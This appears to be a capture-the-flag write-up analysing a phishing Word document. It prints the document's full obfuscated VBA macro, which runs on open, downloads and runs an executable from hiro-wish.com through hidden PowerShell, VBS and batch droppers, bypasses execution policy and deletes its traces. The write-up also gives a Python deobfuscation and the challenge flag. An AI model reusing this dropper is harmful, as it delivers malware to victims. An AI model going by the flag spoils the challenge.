Day 4: Giveaway
challenge description
Santa's SOC team is working overtime during December due to Christmas phishing campaigns.
A new team of malicious actors is targeting mainly those affected by the holiday spirit.
Could you analyse the document and find the command & control server?
Give what away?
Only a Word document is provided. Obviously, some Macro commands must have been hidden in the document which is activated upon opening the file.
We can use a nice Python tool oletools to obtain the Macro commands.
Sub Auto_Open()
h
End Sub
Sub h()
Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
USER = Environ("username")
PST1 = "adobeacd-update.p" + Chr(115) + "1"
BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
VBT1 = "adobeacd-update." + Chr(118) + "bs"
VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"
MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
XPFILEDIR = "c:\Windows\Temp\" + VBTXP
XPBARTFILEDIR = "c:\Windows\Temp\" + BART
On Error Resume Next
SetAttr MY_FILENDIR, vbNormal
If (Len(Dir(MY_FILENDIR)) <> 0) Then
Kill MY_FILENDIR
End If
On Error Resume Next
SetAttr MY_FILEDIR, vbNormal
If (Dir(MY_FILEDIR) <> "") Then
Kill MY_FILEDIR
End If
On Error Resume Next
SetAttr MY_FILDIR, vbNormal
If (Dir(MY_FILDIR) <> "") Then
Kill MY_FILDIR
End If
On Error Resume Next
SetAttr XPFILEDIR, vbNormal
If (Dir(XPFILEDIR) <> "") Then
Kill XPFILEDIR
End If
Dim FileNumber As Integer
Dim FileNumb As Integer
Dim FileNu As Integer
Dim mttt As Integer
Dim retVal As Variant
'Dim winver As Integer
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile
Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem In colOperatingSystems
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
Next
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next
winver = Val(winverstr)
WaitFor (1)
If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
Print #FileNumber, "$hash = '0';"
Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
Print #FileNumber, "Start-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber
Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
Close #FileNumb
Open MY_FILEDIR For Output As #FileNu
Print #FileNu, "@echo off"
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "chcp 1251"
Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
Print #FileNu, "exit"
Close #FileNu
SetAttr MY_FILENDIR, vbNormal
SetAttr MY_FILEDIR, vbNormal
SetAttr MY_FILDIR, vbNormal
WaitFor (1)
retVal = Shell(MY_FILEDIR, 0)
End If
If (winver <= 5.5) Then
Open XPBARTFILEDIR For Output As #FileNu
Print #FileNu, "@echo off"
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
Print #FileNu, "ping 1.1.2.2 -n 2"
Print #FileNu, "c:\Windows\Temp\444.exe"
Print #FileNu, ":loop"
Print #FileNu, "ping 1.1.2.2 -n 1"
Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
Print #FileNu, "exit"
Close #FileNu
WaitFor (2)
mttt = 88
Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
Print #FileNumber, "objXMLHTTP.send() "
Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
Print #FileNumber, "objADOStream.Open "
Print #FileNumber, "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.SaveToFile strTecation "
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "End if "
Print #FileNumber, "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
Close #FileNumber
WaitFor (1)
retVal = Shell(XPBARTFILEDIR, 0)
End If
findTest
secondTest
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "sel" & "ect>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</s" & "ele" & "ct>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub findTest()
Dim firstTerm As String
Dim secondTerm As String
Dim rrtt As Range
Dim selRange As Range
Dim selectedText As String
Set rrtt = ActiveDocument.Range
firstTerm = "<se" & "lect>"
secondTerm = "</sel" & "ect>"
ASKASAIEJ = "ask as8d j vnbnfghfthfth sad"
With rrtt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad"
rrtt.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = rrtt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASKSASADW = "asjldklas"
rrtt.Collapse direction:=wdCollapseStart
selRange.End = rrtt.Start
selectedText = selRange.Delete
End With
End Sub
Sub secondTest()
Dim firstTerm As String
Dim secondTerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String
Set yytt = ActiveDocument.Range
firstTerm = "<in" & "box>"
secondTerm = "</in" & "box>"
ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad"
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKIEJ = "ask as8d j vnbnfghfthfth sad"
yytt.Collapse direction:=wdCollapseEnd
ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad"
Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad"
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
There are multiple obfuscated code but the most prominent seems to be at the bottom where there are calls to a http address. Targeting that, we can use Python to simplify it. Viola!
p1 = "https://elvesfactory/" + "H" + chr(84) + "B" + "" + chr(123) + "" + chr(84) + "h" + "1" + chr(125 - 10) + "_" + "1s" + chr(95) + "4"
p2 = "_" + "present".replace("e", "3") + chr(85 + 10)
p3 = "everybody".replace("e", "3")
p3 = p3.replace("o", "0") + "_"
p4 = "w" + "4" + chr(110) + "t" + chr(115) + "_" + "f" + "0" + chr(121 - 7) + chr(95)
p5 = "christmas".replace("i", "1")
p5 = p5.replace("a", "4") + chr(119 + 6)
print(p1 + p2 + p3 + p4 + p5)
Flag
HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}